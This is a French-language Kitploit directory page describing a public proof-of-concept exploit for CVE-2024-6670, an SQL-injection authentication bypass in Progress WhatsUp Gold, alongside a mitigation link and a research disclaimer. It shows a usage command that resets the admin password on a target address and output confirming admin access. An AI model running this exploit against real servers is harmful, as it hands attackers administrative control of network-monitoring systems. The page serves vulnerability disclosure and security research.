Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-6670 — Exploit de preuve de concept pour Progress WhatsUp Gold contournement d'authentification par injection SQL (CVE-2024-6670). Inclut une analyse des causes racines et une réinitialisation automatisée du mot de passe pour obtenir un accès administrateur. | Kitploit
Outils/GitHubGitHub/sinsinology/cve-2024-6670
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubsinsinology/cve-2024-6670

CVE-2024-6670

Exploit de preuve de concept pour Progress WhatsUp Gold contournement d'authentification par injection SQL (CVE-2024-6670). Inclut une analyse des causes racines et une réinitialisation automatisée du mot de passe pour obtenir un accès administrateur.

Voir le dépôt
355il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-6670

PoC pour la vulnérabilité de contournement d'authentification par injection SQL HasErrors dans Progress Software WhatsUp Gold (CVE-2024-6670)

Une analyse de cause racine de la vulnérabilité est disponible sur mon blog :

https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/

ZDI

Utilisation

root@kitploit:~
python CVE-2024-6670.py --newpassword Pwned --target-url https://192.168.201.150

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress Software WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability (CVE-2024-6670)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam), shoutout to @indishell1046

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-sqli-cve-2024-6670/


[^_^] Starting the exploit...
[*] Used remote primitive to encrypt our passowrd
[*] encrypted password extracted -> 0x03000000100000000EABC7F4B1C8263DADB17E4BED835C0F
[+] Exploit finished, you can now login using the username -> admin and password -> Pwned





Atténuations

Mettez à jour vers la dernière version ou atténuez en suivant les instructions du bulletin Progress Advisory

  • https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024

Manish Kishan Tanwar

Sans la motivation et les leçons que mon cher ami Manish m'a enseignées au fil des années où je le connais, je n'aurais pas pu exploiter ce bogue. Merci mon ami.

Suivez-nous sur Twitter(X) pour les dernières recherches en sécurité :

  • SinSinology
  • SummoningTeam

Avertissement

Ce logiciel a été créé uniquement à des fins de recherche académique et pour le développement de techniques défensives efficaces, et n'est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables d'une mauvaise utilisation du logiciel. Utilisez-le de manière responsable.

Télécharger l’outil